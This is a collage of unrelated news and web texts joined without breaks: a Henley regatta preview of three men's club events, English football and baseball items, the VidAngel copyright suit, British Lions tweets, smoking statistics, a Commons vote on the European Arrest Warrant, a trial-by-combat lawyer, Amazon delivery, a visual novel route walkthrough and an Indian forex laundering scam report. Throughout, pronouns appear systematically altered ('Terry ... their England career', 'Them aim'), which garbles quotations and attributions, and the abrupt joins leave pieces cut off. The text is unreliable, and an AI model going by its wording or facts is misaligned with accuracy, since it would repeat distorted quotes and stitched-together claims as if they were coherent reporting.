Time now for the one 's everyone 's interested in…the men 's club events .
The Thames Cup
Holders : Molesey Boat Club
The Stewards have picked out 8 crews to be Selected , four from the UK two from Germany and one each from Norway and the USA .
In the top half of the draw the first of the selected crews are Thames Rowing Club “ B ” . It 's a mark of the strength in depth of the Putney club that they have qualified three boats in this event and two of them have been selected . The “ B ” crew raced on both days of the Metropolitan Regatta finishing 4th in the Tier 2 8 's on the Saturday and following that up with 2nd place in the “ C ” Final of Challenge 8 's on the Sunday . They also raced at Marlow finishing 3rd in Tier 2 8 's – crucially being the fastest club eight in the race ( losing to Oxford Brookes and Imperial College ) . Looking at the draw they face City of Oxford on Wednesday and the winner of Kingston & Molesey on Thursday . Having beaten both of these crews already this season the Thames boys will be confident of reaching Friday 's quarter finals .
If Thames does reach the quarter-finals they will most likely face the 2nd of the Selected crews in the top half of the draw , Ruder Club Allemania von 1866 , Germany . The German 's have a number of U23 internationals on board including Peruvian Nicolas Pezet at bow . They raced in the U23 BM1X at the 2016 World Championships . At 4 is Gregory Schaltegger who was the spare for the 2014 U23 team . At 7 is Jonas Briese – who made the A-Final in the BLM2- at the 2013 World Championships .
The third Selected crew in this half of the draw are London Rowing Club . Since the war London have won this event 6 times but the last was back in 2006 . They 'll be desperate to make it number 7 . But , they face a really tough challenge on Wednesday when they face Agecroft . Both of these boats raced in the B-Final of Champ 8 's at Marlow with London emerging victorious by just 0.2 second . It could be too close to call between these two and London could well be the first Selected crew to fall .
The final selected boat in the top half of the draw is Riverside Boat Club from Boston Massachusetts . In the words of one club member this crew is “ the fastest eight the club has ever had ” . At the Head of the Charles last October this crew finished 5th in the Club 8 's events . Henley has been their main focus for the season and will be disappointed if they do n't make it through a few rounds . They have drawn Tideway Scullers on Wednesday and will be confident of progressing .
In the bottom half of the draw the first of the selected crews are RTC Bayer Leverkusen , Germany . Five of this crew reached the final in 2015 losing to Thames Rowing Club . The returning members are Dominik Drueke , Thorsten Jonischkeit , Dominic Imort , Fabian Weiler and Fabien Wimberg .
The next Selected crew are Leander Club . This is the Pink Palace 's development 8 although sitting in the 6 seat is Paralympic gold medallist James Fox . They raced at the Metropolitan Regatta finishing 7th and then at the Champ 8 's at Marlow Regatta they finished 5th .
The next Selected crew are the Norwegians from NSR Oslo . The Norwegians made the final of the Thames Cup last year and have half of the crew returning – Petter Tufte , Hallvand Bjorkeland , Markus Holmemoe & Enn Sture . At the recent Nordic Championships Tufte and Matti Saborowsky won the M2- .
The final selected crew are Thames Rowing Club “ A ” . Thames won this event for the first time since the war in 2015 and will be the favourites from the home crews for the title . So far this season they raced at the Metropolitan regatta finishing as the fastest club in 5th . At Marlow they were also the fastest club finishing 4th in the Champ 8 's .
Fastest of the non-Selected crews could well be the New Zealanders from Avon Rowing Club . At the New Zealand Championships in February they won the Club 8 's . Half the crew also won the Club 4+ . They face Cantabrigian on Wednesday and then a possible match up against Riverside on Thursday .
As mentioned above , Agecroft could cause the Selected London Rowing Club some difficulties in the first round .
Molesey are the defending champions and this year 's crew raced in Tier 2 at Marlow finishing 2nd in the B-Final .
My picks…I think this could well be an Avon v Thames final with the honours going to the Thames .
The Wyfold Challenge Cup
Holders : Grasshopper-Club , Zurich , Switzerland
8 crews have been selected for the Wyfold Challenge Cup . In the top half of the draw the first of these is London Rowing Club . They last won this event in 2011 . This year 's crew of Matt Cummings , Nick Parnell , Stephen Griffiths & Dom Parnell raced on both days of the Metropolitan Regatta taking 3rd place on both days . They also raced in the final of Champ 4- at Marlow Regatta finishing 5th .
The 2nd of the Selected crews in the top of the draw is Sydney Rowing Club , Australia . The Sydney-siders are regular visitors to Henley and won this event in 2009 . Their crew for 2017 is Max Brenner , Clinton Boltman , Jack Quinn and Nick Clifton . They raced the U23 BM4- at the Holland Beker last weekend finishing 3rd of the 3 crews . Back in Australia they four of them were members of the Sydney M8 that won silver in the Men 's Club 8 's at the Sydney International Rowing Regatta . They also picked up a silver medal in the club 4 's event .
The third of the Selected crews in the top half are The Tideway Scullers School . All highly experienced Henley competitors with Nathan O'Reilly , Lloyd Seaman , Will Fields and Murray Wikojc . They finished in 5th place in Champ 4- ‘ s on the Sunday of the Metropolitan Regatta and then 4th at Marlow half a second behind Sport Imperial and only half a second ahead of London .
The final Selected crew in the top half are the Dutch from K.A.R.Z De Hoop . This crew have been targeting this event all season and have put together a strong-looking bid . At bow is Frank Verschoor who raced in the Temple Challenge Cup for Nereus , losing the final in both 2010 and 2011 . At 2 is Dom Meyrick-Cole – they raced as part of the Nereus “ Oude-Vier ” in 2015 , but illness kept them out of the boat for Henley . At 3 is Marlou Kamphuis from Groningen , a winner of the Head of the Amstel . Stroking the boat is Mathew Kleine Punte , another Nereus alumni who rowed in the Temple finals in 2010 and 2011 . As a four this season they have a 2nd place at the ZRB Regatta and won the Thetis sprint , defeating the Dutch U23 crew in the process .
In the lower half of the draw the first of the selected crews are Mercantile from Australia . The crew includes Andrew Burke and Angus Maloney who were part of the M8 that won the U23 's at the Australian Championships . Joining them in the crew are Tom Hunt and Callum Nott .
The next selected crew are Sport Imperial – possibly the leading home crew in the event . The crew of Sam Butler , Matt Pointing , Josh Butler and Matt Whaley raced to a 4th place at the Metropolitan Regatta and 3rd at Marlow – in both cases they were the leading Wyfold eligible crew . The margins between them and the likes of Tideway Scullers and London may be small , but those wins will give them the edge in a match race .
The 3rd Selected crew in the lower half of the draw are the Irish from Commercial Rowing Club – Colm Dowling , Michael Corcoran , Fionnan Groome & Shane MacEoin . Corcoran raced for Trinity College , Dublin in the Prince Albert last year losing in the heats . Dowling , Groome & MacEoin have all represented Ireland at the Home International Regatta and last season Dowling and Groome were in the Commercial crew that won Senior 8 's at the Irish Championships – setting a new record in the process .
The final Selected crew in the event are Thames Rowing Club . Another crew of seasoned Henley campaigners with James Palmer , Will Downey , Luke Wertheim and Harry Dorrance-King . They raced at Marlow Regatta finishing 6th in the Champ 4- A-Final . If the Selections pan out as intended by the Stewards they should meet the Irish on Friday .
Outside of the Selected crews the ones to watch include the Norwegians from Christiana Roklub , 8th in Ghent and including Nikolai Jorgensen who rowed for London RC in the Britannia Challenge Cup in 2013 , and Kristoffer Lorentzen who raced for Norway at the 2013 Universidad .
Another crew to watch are City of Bristol . The West Country club is developing into a force to be reckoned with in that part of the world and have successfully qualified 2 boats for the Wyfold . The boys from Bristol dock in the “ A ” crew are having an excellent season finishing 3rd in the B-final of Champ 4 's at Marlow and 2nd in Tier 2 at the Metropolitan . As a Bristolian myself I 'll be cheering them on in their tough 1st round race against Maidstone Invicta who themselves were winners of Tier 4 4- ‘ s at the Metropolitan .
Maidenhead is another one to watch , finishing 2nd & 3rd in the Tier 3 events on both days of Metropolitan Regatta . They have drawn Radley Mariners in round one and will be confident of progressing to a likely meeting with the Thames on Thursday .
The final crew to mention are Northwich – Joe Anderson , Finn Lawton , Harry Taylor and George Lawton . They won Tier 3 4- at the Metropolitan Regatta and Tier 2 at Marlow . George Lawton raced for GB last year at the Junior World Championships . The draw gives them a potential meeting with London on Thursday , and the Selected Londoners will have a real fight on their hands to progress .
My picks….really tricky….I think we will have a K.A.R.Z De Hoop v Sport Imperial final with the Imperial boys just sneaking it .
The Britannia Challenge Cup
16 crews in this event of which half are deemed worthy of “ Selection ” . In the top half it 's Thames Rowing Club that are the first Selected crew . They probably earned the Selection nod from the Stewards after a strong performance at Marlow Regatta , finishing 5th in the A-Final of Champ 4+ . This followed a good regatta at the Metropolitan with a 2nd place in tier 2 on Saturday , losing to National University Ireland , Galway and a win in Tier 2 on Sunday . Thames face Wallingford in round 1 , a crew they have beaten a number of times this season so will be confident of progressing .
If successful against Wallingford , Thames will face the winner between Agecroft and the 2nd Selected crew The New York Athletic Club , USA . The New Yorkers are Bucknall graduates Veton Celaj and Connor Corwen along with Colby College 's Noah Teachey and Dan Curtis . At the Head of The Charles Regatta NYAC finished 4th in the Club 4 's . They face a tricky contest against Agecroft in round 1 , they finished 2nd in Tier 4 at the Metropolitan Regatta and will be a good test for the Americans .
The 3rd of the selected boats in this event are Kingston Rowing Club . Kingston have won this event twice , the last time being 1978 . This season they raced at Ghent May Regatta finishing 5th and also finished 5th in Tier 2 4+ at the Metropolitan Regatta . They have a tricky first round match-up as well , facing the Norwegians from N.S.R Oslo . This boat includes former Harvard oarsman and Australian U23 international Ed Northorp . He 's joined by Norwegian U23 international and Henley finalist Ole Bang-Andreason . Also in the crew is former Brazilian junior international Francisco Mendes . The Norwegians are probably unlucky not to have been Selected themselves and could well be too quick for the Kingstonians .
The final Selected crew on this side of the draw are the Australians from Sydney Rowing Club . Sydney won this event in 2015 and could go far again this year . The crew includes University of California , Berkeley graduate Michael Bernerius , they raced at U23 level in 2013 finishing 4th in the BM4+ . Also in the crew is Henley finalist Charles Patterson , they were in the crew that were beaten in the quarter finals of the Prince of Wales Cup in 2014 and then in the Wyfold crew that lost to Petone of New Zealand in the heats . In the three seat is William O'Connell , they were a member of the Sydney Rowing Club crew that finished 2nd in Club 4- ‘ s at the Sydney International Regatta . They face Southampton Coalporters in the first round and will be confident of progressing to face either Kingston or Oslo in the 2nd round .
In the bottom half of the draw the first Selected crew are the Bostonians from Riverside Boat Club , USA . At the Head of the Charles this crew finished 6th in the Club Fours , 30 seconds behind NYAC . This crew includes Alex Barat , a graduate of Worcester Polytechnic Institute and now assistant coach at Clark University and James Primes of Boston College . They are drawn to meet qualifiers Stratford-upon-Avon in the first round and then ( assuming they are victorious ) , the winner of St. Andrew Boat Club from Scotland and Club De Nautique , France . St. Andrews are the selected crew and have raced a number of times in England , at the Metropolitan Regatta they picked up a 2nd place in Champ 4 's on the Saturday and 5th in Tier 1 on the Sunday . At Marlow Regatta they finished 1st in the B Final of Champ 4 's . This crew includes U23 international Graham Ord who was 9th in the BM2- at last year 's World Championships .
The next Selected crew are the 2nd Australian crew in the event , U.T.S Haberfield . This crew were winners of the Open Club 4+ at the Australian Championships and last weekend raced at the Holland Beker finishing in 3rd behind the NYAC Visitors 4 .
The final selected crew are Molesey , who last won this event in 2008 . This year 's crew raced in Tier 1 at the Metropolitan Regatta finishing 4th , but were the first of the Britannia Cup eligible crews . It was a similar story at Marlow Regatta where they finished 4th in the Champ 4+ event but were the highest placed Brit crew . They face a tricky first round tie against the Germans from R.T.C Bayer Leverkusen .
My picks…it 's a very open field , the top half of the draw is especially stacked with the Thames , Sydney , NYAC and Oslo . I 've a feeling we may see a Molesey/Thames final and I 'm going for Molesey for the win .
Advertisements
Roy Hodgson has ruled out an England recall for Chelsea 's John Terry . Roy Hodgson has ruled out an England recall for Chelsea 's John Terry .
Terry voluntarily ended their England career in September 2012 but , following successive home defeats by Chile and Germany last November , and Terry 's excellent form for Chelsea , there have been calls for their return to the international set-up .
But Hodgson told reporters at Wembley : `` John has retired . As far as I 'm concerned , that is the situation and there is no point me discussing retired players .
`` We have got along without them for the whole of the qualification and quite a few friendly matches , and we 'll have to get along without them in the future . As far as I 'm concerned , retirement is retirement .
`` You respect that when players retire , we move on . We moved on after our first qualification game when John Terry limped off and since that time we have chosen the players who are available , who have represented us well in my opinion , so we will continue with that . ''
Terry , 33 , won the first of their 78 caps in June 2003 and succeeded David Beckham as England 's captain in 2006 . They lost the captaincy for the first time in February 2010 after allegations about their private life and regained it a year later .
The FA then took the armband away from them before the 2012 European Championship - prompting England manager Fabio Capello to resign - with Terry facing a court case over alleged racial abuse of the Queens Park Rangers player Anton Ferdinand .
Terry was found not guilty but was still charged separately by the FA , and retired from international football in protest . The FA 's independent commission found them guilty , banning them for four matches .
Meanwhile , Hodgson insists Terry 's Chelsea team-mate Ashley Cole remains part of their World Cup plans despite struggling to hold down a regular first-team spot under Jose Mourinho .
With the Portuguese preferring Cesar Azpilicueta at left-back , Cole 's playing time has been limited casting doubt over their participation at Brazil this summer .
`` Full-backs are like goalkeeperes either you play or someone takes your place , '' said Hodgson . `` We know what Ashley can do we know how fit they keep himself , we know how experienced they are .
`` So I would n't write Ashley Cole out of any plans simply because they are n't playing in their club team . But , like anyone else , the competition for their place gets stronger all the time and I will have a decision to make . ''
And Hodgson is adamant playing outside the Barclays Premier League will not affect former Tottenham striker Jermain Defoe 's chances of making their final squad .
`` He will be playing but they will be playing in a league a long way from the top league over here but that wo n't change a thing as far as I am concerned , '' they said .
`` I know what Jermain can do and we will pick them on those merits . If they do n't get picked it will be because I feel on this occasion there was n't space because I preferred other players .
`` When Jermain comes with an England team I know they are a very reliable player and they have been a wonderful servant during the two years I have been with England . ''
Jered Weaver is going to wear No . 27 with the Padres because they want to hit like Mike Trout
Jered Weaver racked up 150 victories and three top-five Cy Young Award finishes with the Angels , but they collected only four singles , with the last coming back in 2012 . Not too surprising considering that he 's , you know , a pitcher in the American League . But when it came time to pick out their number after signing with the Padres , Weaver knew the best person to emulate : Mike Trout and their No . 27 .
Players choosing the number of a player they grew up idolizing is n't very strange . Choosing the number of your ex-teammate that is nine years younger ? That 's a little different .
`` I figured I 've got to hit [ with the Padres ] , '' the hurler told MLB.com 's AJ Cassavell . `` I went Mike Trout on them , so maybe that 'll help with my hitting . The numbers were slim pickings . I texted Trout and asked them if it was OK . They said they could n't wait to see 27 on my back . ''
While Weaver did put together an epic two-game hitting streak in 2010 , if the right-hander comes out of Spring Training showing off power , speed and a patient batting eye , I think we 'll know : It 's not the player that has won two MVP awards and finished second three other times -- it 's the number .
Michael Clair writes about baseball for Cut4 . They believe stirrup socks are an integral part of every formal outfit and Adam Dunn 's pitching performance was baseball 's greatest moment .
VidAngel Is Being Sued And Here 's What We Know So Far
We 're as confident now as we were when we launched that filtering a DVD or Blu-ray you own on your favorite devices is your right . We 're ready .
Beehive Startups Blocked Unblock Follow Jul 27 , 2016
Disney , Lucasfilm , 20th Century Fox , and Warner Bros are suing local startup VidAngel for infringing the studios ' exclusive rights under the Copyright Act and for violating the Digital Millennium Copyright Act . VidAngel CEO Neal Harmon declined a request for an interview with Beehive Startups but released the following statement on the VidAngel website :
“ Disney , Lucasfilm , 20th Century Fox , and Warner Bros have filed a complaint against VidAngel in federal court . We wish they would have let us know they had issue with VidAngel back in July 2015 when we wrote them a letter to inform them about VidAngel 's lawful service . However , we 've hired great Hollywood attorneys . We 're as confident now as we were when we launched that filtering a DVD or Blu-ray you own on your favorite devices is your right . We 're ready . More to come . ”
VidAngel , which allows users to buy a movie for $ 20 then sell it back for $ 19 , has tried to set its service apart from the CleanFlix and CleanFilms of yore , which created edited copies of DVDs then burned derivatives to sell to customers and were ultimately shut down . A recent blog post on vidangel.com reads , “ Unlike CleanFlix and Cleanfilms , VidAngel does n't change any of the original content . VidAngel is more like a very powerful remote control . Anything you can do manually on your own computer , you can also use VidAngel to accomplish. ” The post also states , “ VidAngel is completely legal. ” Disney , Lucasfilm , 20th Century Fox and Warner Bros disagree .
The lengthy complaint filed by the plaintiffs cites a number of reasons why the studios consider VidAngel 's services illegal . The studios claim that VidAngel does not possess the rights ( rights that they require other video-on-demand services to purchase ) to stream movies and television shows and is circumventing technological protection measures to create unauthorized copies of those movies and television shows to stream to customers . This practice , the plaintiffs allege , violates the Copyright Act .
The studios are also less than thrilled that VidAngel is able to offer streamed content before other video-on-demand services and at a lower cost . The complaint states , “ If left unabated , VidAngel will undermine the Plaintiffs ' relationships with their authorized licensees and interfere with Plaintiffs ' ability to negotiate with those legitimate VOD services. ” In other words , if VidAngel continues to grow , other streaming services will be less willing to pay studios for exclusive rights to content already available on VidAngel . Streaming services less willing to pay studios for exclusive rights means less money for those studios . VidAngel is disrupting the marketplace in a real way , and big players in Hollywood do n't like that one bit . Customers , on the other hand , love cheaper , quicker access to new movies .
Whether VidAngel has infringed copyright or violated the Digital Millennium Copyright Act is for a judge or jury to determine . I suspect the case will boil down to whether or not VidAngel has the right to stream the content they 've bought and paid for — if the answer is no , there are some problematic implications regarding property ownership . But I 'm not a legal expert and I have not read the copyright act to which the plaintiffs point .
Undoubtedly a painful , expensive legal battle awaits VidAngel . But the company can take pride in knowing that they 've made a splash . True disruption and loyal customers are all any startup can ever hope for .
We plan to cover this story as it unfolds . Stay tuned .
Published 6/16/2016
The Lions are drawing up Twitter and social media guidelines for their players to observe on the tour to Australia , but they have now been forced to remove two tweets from their own official account in a week .
The Lions issued an apology after a picture of a springbok impaled on a railing was used on their Twitter account on Tuesday , accompanied by the words : `` Is n't this what @ lionsofficial did to Springboks in the 3rd Test in Johannesburg 2009 ? @ qantaswallabies be warned . ''
Just before the 37-strong squad was announced last week , a message was posted for players hoping to make the tour : `` If you 're player waiting to watch TV at 11.00am to see if you 're in @ lionsofficial squad how are you feeling ? Excited , nervous – suicidal ? ''
Some 90 minutes after the springbok picture and message had been posted , the Lions , who have 91,000 followers on Twitter , tweeted : `` @ lionsofficial would like to apologise for any offence caused by recent and inappropriate tweets . ''
The picture of an impaled springbok that was deleted from the official Lions Twitter account .
The Lions tour manager , Andy Irvine , said last week that the tourists were determined to ensure that messages posted by players on Twitter and other social media sites did not embarrass themselves and the squad . On the last trip to Australia , in 2001 , newspaper columns were used to express individual discontent .
`` There is a guideline being laid down and it will encompass all the best from the home unions , '' they said . `` It has not been finalised yet but the players will be asked to sign up . What we do n't want is a repeat of 2001 – that would not be healthy for the tour .
`` From past experience I know guys who do n't make the Test side can sometimes be a little bit loose with their comments and I hope we can knock a bit of common sense into them . We are out there , we are all together , we know some guys will be disappointed and it is to be hoped they will behave . ''
SMOKING , you may have heard , is unhealthy . On May 31st its adversaries celebrate World No Tobacco Day , an annual event that since 1987 has spread the word . Lawmakers have listened , wrapping tobacco firms with regulations . They have piled on taxes and boxed in marketing teams . Australia requires plain packaging for its cigarettes and on May 28th Ireland 's health minister said they were planning a similar ban .
Get our daily newsletter Upgrade your inbox and get our Daily Dispatch and Editor 's Picks .
This is having an effect . ERC , a research firm , says consumption per person was 999 cigarettes a year in 1990 and only 882 in 2012 . Yet the appetite for cigarettes continues to rise . Smokers lit up 5.9 trillion times last year compared with 5.1 trillion in 1990 . Population growth accounts for much of the increase . But the numbers would be higher still if they included black-market ciggies .
Temperance in some countries is matched with growing addiction elsewhere . In western Europe consumption per person fell by 42 % —from 1,744 smokes in 1990 to 1,003 last year . Anti-smoking laws in Panama helped consumption per person plunge by 70 % . It boasts one of the world 's lowest rates .
But people in other places puff away merrily . Together , China 's 1.3 billion citizens plough through more packets than anywhere else . The average Chinese person smoked 30 % more in 2012 than in 1990 , ranking the country 11th by consumption per head . Lebanon and Myanmar saw even more dramatic growth ( though a shift from illicit to official sales somewhat distorts those trends ) .
ERC tracks 123 countries , home to about 99 % of smokers . It finds the worst addicts in central and eastern Europe . Serbians each smoke a lung-blackening 3,323 cigarettes per year , more than any other nationality . Eight of the top ten countries , ranked by consumption per person , are in the former Eastern block . The World Health Organisation thinks tobacco accounts for nearly 10 % of adult deaths . A high cost for a small pleasure .
Image caption Theresa May tried to convince Conservative rebels to back the measures
How do you win a vote in the Commons and yet lose at the same time ?
How do you give MPs a vote on a crucial issue only to be attacked from all sides for not giving them a vote at all ?
How do you woo potential rebels yet find they 're furious about the way they 've been treated ?
Those are questions the home secretary must be asking herself .
Weeks ago they were warned that they faced a rebellion of over 100 Tory MPs over their decision to sign the UK up to the controversial European Arrest Warrant which allows suspected criminals to be extradited at a speed from other EU countries to here and vice versa .
Theresa May spent many hours trying to convince them that this was a law and order issue and not an example of Brussels interfering too much once again .
Them aim to squash a huge backbench rebellion came just a couple of weeks before a vital by-election caused by a Tory defector to UKIP .
Yet in the space of a few hours the Speaker ruled that the government 's motion was not a vote on the arrest warrant at all and accused them of failing to honour their commitment to give one ; Tory backbenchers protested at what they called chicanery , and the opposition formed an alliance with Conservative rebels which almost defeated the government .
The curiosity of it all is that on the issue in question , the arrest warrant itself , Mrs May had won the argument and would have easily won the vote - if , that is , she 's ever actually had one .
Several months ago we wrote about Richard A. Luthmann , the Staten Island attorney seeking trial by combat to resolve a dispute alleging that they helped a former client fraudulently transfer assets .
Now a New York state judge has weighed in and determined that while Luthmann is indeed correct that trial by combat is absolutely a viable option for resolving a legal dispute , they would decline to order it in this matter :
This week , state Supreme Court Justice Philip G. Minardo ruled in a one-page decision that the case would be resolved without medieval violence . Justice Minardo did , however , agree with Luthmann that in theory , the court had the power to sanction a trial by combat . Luthmann , their honor still apparently besmirched , filed a notice to appeal the judge 's ruling to a state appellate court .
So you 're saying the case has hit a dissatisfying end and now we have to wait an interminable amount of time for a conclusion ? This really is a Game of Thrones remedy .
For those who do n't recall why Luthmann went down this road , it all started after the other side filed a motion to preclude Luthmann from filing a lawsuit against them :
“ They tried to say that I was the facilitator , that I tried to do this and that , ” says Luthmann . “ And I said to them , ‘ You guys are a bunch of idiots . If I 'm that bad of an actor , why did n't you see me from the very beginning ? ' ” Luthmann responded by filing a motion to dismiss , and using other legal processes to frustrate the plaintiff 's case . Finally , the other side filed a motion to preclude and restrain Luthmann from filing a lawsuit against them . “ I said , ‘ If I 'm a lawyer and I 'm not allowed to file papers , then this is the end of things—we might as well go to trial by combat , ” Luthmann says . “ We might as well get out the swords and the shields at dawn and settle it that way . I met their absurdity with absurdity in kind . ”
And even though they brought their motion to prove a point , the devoted Game of Thrones fan is ready to rumble . He 's even explained to the local news how he 'd win their fight to the death , and it 's amazing :
The “ Warhammer of Robert Baratheon. ” Hm . Watching this guy barely hold their own with a plastic Mjölnir ( “ Whosoever holds this hammer , if they have $ 10.99 , shall possess the power of… LARPing ” ) , I have some serious concerns about their warhammer chops . That said , I guess I have n't seen their potential adversaries practice . And maybe Luthmann is a real expert and just trying not to tip their hand in this video — the reporter does note that the office boasts something of a toy arsenal to practice with .
Still , of all the fanciful toys apparently filling this guy 's office , I 'm pretty sure the most ludicrous is the “ Make America Great Again ” hat over their shoulder in this interview .
No ‘ Game of Thrones ' throwdown : trial by combat nixed for lawyer Richard Luthmann [ SI Live ]
This Game of Thrones-Loving Lawyer Explains Why He 's Seeking a Trial by Combat [ Good ]
‘ Trial by combat ' lawyer : How I 'd win a fight to the death [ SI Live ]
Earlier : Is Trial By Combat Coming To NYC ?
Trial By Combat : It Was Real And Spectacular
Amazon is upping the ante on same-day delivery and metro Atlantans will be one of the beneficiaries .
Beginning Thursday , members of the Internet giant 's Prime program in Atlanta and more than a dozen other cities will get free same-day delivery on more than 1 million items in what the Seattle company calls “ Amazon Prime Free . ”
Amazon Prime customers pay $ 99 a year for membership , which includes access to Amazon Instant Videos and music ( Amazon 's version of Netflix ) and a lending library for books .
To get the deal , Prime members must spend $ 35 and put their orders in before noon , the company said . The requested items will be delivered before bedtime .
Retailers have used delivery speed to distinguish service in the face of fierce competition for consumer dollars . Same day in-store pick up has also become gained in popularity among retailers such as Atlanta-based Home Depot .
Metro areas eligible for Amazon Prime 's same-day delivery include Atlanta , Baltimore , Boston , Dallas-Ft Worth , Indianapolis , Los Angeles , New York , Philadelphia , Phoenix , San Francisco , Seattle-Tacoma , San Diego , Tampa and Washington , D.C .
Check for eligible zip codes at www.amazon.com/sameday .
This is a walkthrough for the English version of Dies irae – Amantes amentes . The Japanese walkthrough it 's based on can be found here .
Recommended route order : Common ( Chapters 1-6 ) – > Kasumi – > Kei – > Marie – > Rea
Follow the above route order , trust me . Otherwise you 'll ruin the story for yourself .
Okay , so here 's the thing . Before you start the game , you 're shown this screen :
If you 're a first-time player , make absolutely sure to pick “ New Game ” on the left . If you pick any of the hero buttons on the right , the game will lock you onto said routes regardless of your dialogue choices .
Note 1 : The Other Stories can be accessed from the main menu , under ( you guessed it ) Other Story . One thing to note is that “ Omnia vincit Amor ” is essentially a Marie route epilogue , while “ Nihil difficile amanti ” , in a similar fashion , provides an epilogue for Rea 's route . As such , I would recommend reading those two extra stories immediately after finishing their respective routes . As for the other three side stories , I 'd recommend reading “ Wehrwolf ” after finishing Kasumi 's route , then “ Die Morgendämmerung ” and “ Verfaulender segen ” after completing Kei 's route .
Note 2 : Rea 's route has two endings . Go for Ending 1 first ( “ danced to the… etc . ) , then Ending 2 ( …sought the truth ) afterwards for the optimal reading experience . Also , make absolutely sure you follow the walkthrough very closely . Particularly in Rea 's route , you need to pick “ Look for Rusalka ” , “ Trust Rusalka ” and “ Rescue Rea Himuro ” , otherwise you wo n't see some very important optional scenes .
Note 3 : You can press F7 in-game to immediately jump to the next choice , while F6 will take you back to the previous choice .
Common / Kasumi Ayase
I was lying , you idiot
Try to persuade them
Take a look
Other Story “ Wehrwolf ” unlocks after Chapter 1
Explore the church
Do n't give my name
Look for Sakurai
* pick every question when talking to Rusalka : What are you people ? – What 's Zarathustra ? – Where 's that other guy ? – Why 'd you come to this city ? – What do you plan to do with me ? *
…All right .
There 's no way in hell I can do that
Save 1
Drag Kasumi away
Disappear right now
To fight
Run away from Sakurai
Ca n't even consider !
Other Story “ Die Morgendämmerung ” unlocks after Chapter 6
Save 2
Suppress the tattoo
Kasumi END
Kei Sakurai
From Save 2
Ask Sakurai about what 's going on
Sakurai
Never give up
Kei END
Other Story “ Verfaulender segen ” unlocks
Marie
From Save 1
Drag Sakurai away
Hide right now
To protect them
Kill Sakurai
Ca n't even consider !
Marie END
Other Story “ Omnia vincit Amor ” unlocks
Rea Himuro
* Start a new game *
The jailbait stuff , I guess
Run away
Go home
Go to the chapel
Do n't give my name
Look for Rusalka
* pick every question when talking to Rusalka : What are you people ? – What 's Zarathustra ? – Where 's that other guy ? – Why 'd you come to this city ? – What do you plan to do with me ? *
What do you think ?
Do I have no other choice ?
Drag Sakurai away
Hide right now
To fight
Kill Sakurai
Will never do !
Trust Rusalka
Rescue Rea Himuro
The truth about my being
Save 3
…danced to the mercurial tune
Rea END 1
From Save 3
…sought the truth
Rea END 2
Other Story “ Nihil difficile amanti ” unlocks
* * *
Extra note : In the Other Story “ Nihil difficile amanti ” , you will be faced with a choice at one point . These lead to two different variations of the scene , so make sure to pick both choices if you want to see everything .
Advertisements
Six people have been arrested including employees of and HDFC Bank in what is now known as the Forex scam . But the details that are coming out in media suggests that this is only the tip of a much bigger scam . More heads are likely to roll and more banks may come under the scanner of interrogating agencies .
ALSO READ : Forex scam traced to HDFC Bank a/cs
Read more from our special coverage on `` FOREX SCAM ''
Let 's take a look at what this scam is all about .
1 ) The Scam and its modus operandi
( BoB ) noticed some unusual transactions from its Ashok Vihar branch in Delhi , a relatively new branch which had obtained permission to accept forex transactions only in 2013 . Within a year , forex business of its Delhi 's Ashok Vihar branch shot up to Rs 21,529 crore .
The bank alerted government agencies who sprung into action , with the Central Bureau of Investigation ( CBI ) and Enforcement Directorate ( ED ) working on the case . Raids were carried out over last weekend on some branches of BoB and residences of a few employees . The raids were in connection with the alleged illegal remittance of around Rs 6,172 crore to Hong Kong between 1 August 2014 and 12 August 2015 .
Let 's now look at the modus operandi of these illegal remittances .
Modus Operandi
Prima facie it seems that two different types of transactions took place , but both the transactions can be related . There is nothing new in the modus operandi on one of the transactions used by money launders who try to earn a quick buck by exploiting government schemes . But it 's the second one which is intriguing .
Transaction one – exploiting export schemes
In the first transaction , a company or an individual exports goods at an higher price to their own fake in order to take benefit of duty drawback scheme of the government . Duty drawback is a refund given by the government to recoup the amount paid by way of custom and excise duties on the raw materials used and service tax on input services used for the manufacture of exported goods . Government uses the duty drawback scheme to promote exports .
Here is an example . Suppose a garment company sells Rs 1,000 worth of shirts for which it used Rs 500 worth of cloth and other materials . The custom duty paid on imports of the cloth or other materials or the excise duty paid on domestic purchases and service taxes paid on all inputs of services will be refunded by the government . If 20 per cent is the tax paid on its raw material , then Rs 100 ( 20 per cent of Rs 500 ) can be claimed as duty drawback .
In this case , dummy were opened in Hong Kong . The exporter who had foreign exchange – black money parked abroad , used these entities as clients who send the money back to India to make the transaction look genuine . Government on receiving the foreign exchange disbursed the duty drawback money to the exporter since the entire transaction was closed .
The problem , as ED points out is that the accused traders evaded custom duties , taxes and over-claim duty drawbacks to generate slush funds . ED says that the accused connived in “ forming ” fake and business entities overseas , particularly in Hong Kong by “ overvaluing ” the export value and subsequently claiming duty drawbacks .
Companies route their exports through these fake entities who re-sell the goods at the market price and pad it up with their own money to claim the duty drawback .
In the garment example , if the market value of the goods sold is Rs 900 , then the dummy company will sell in the market and realise Rs 900 but will send Rs 1000 to its Indian exporter by adding Rs 100 on its own .
This mechanism achieves two purposes . One is the unaccounted black money residing abroad comes to India as white money and the exporter also generates extra income by duping the government through its own export incentive schemes .
Transaction two – advance remittances for imports
BoB in its communication to the stock exchanges said that between May 2014 and August 2015 , 5853 outward foreign remittances of Rs 3,500 crore , mainly for the purpose of 'advance remittances for import ' was recorded . Funds were sent through 38 current accounts to various overseas parties numbering to 400 , mainly based in Hong Kong and one in the UAE .
Advance remittances for imports are basically part payment that an importer makes to confirm their imports . Generally , after the initial advance is paid , an exporter sends the remaining amount either on receipt of the goods or after a lag , depending on the negotiation with the seller . Banks on their part have to check if the remaining amount is sent and the goods have landed by confirming it with import documentations .
The modus operandi in this transaction was that a number of current accounts were opened in the Ashok Vihar branch . As per our banking system , a remittance of up to $ 100,000 does not raise an alarm and is automatically cleared without supporting documents of imports . The money launderers exploited this loophole to pass under the radar . They also smartly selected commodities which are prone to cancellations on account of quality or sharp price fluctuations like fruits , pulses and rice .
2 ) The Players
The scam started taking place by mid 2014 when companies were getting formed in Hong Kong . One such company , Star Exim was incorporated in Hong Kong on August 1 , 2014 , as reported by DNA . Around the same time money transfers started from Bank of Baroda 's Ashok Vihar branch . Bank of Baroda in its internal audit report mentions that most of the transactions , totalling over Rs 6,000 crore , started on the same date as Star Exim was incorporated in Hong Kong , and continued for another year till August 12 , 2015 .
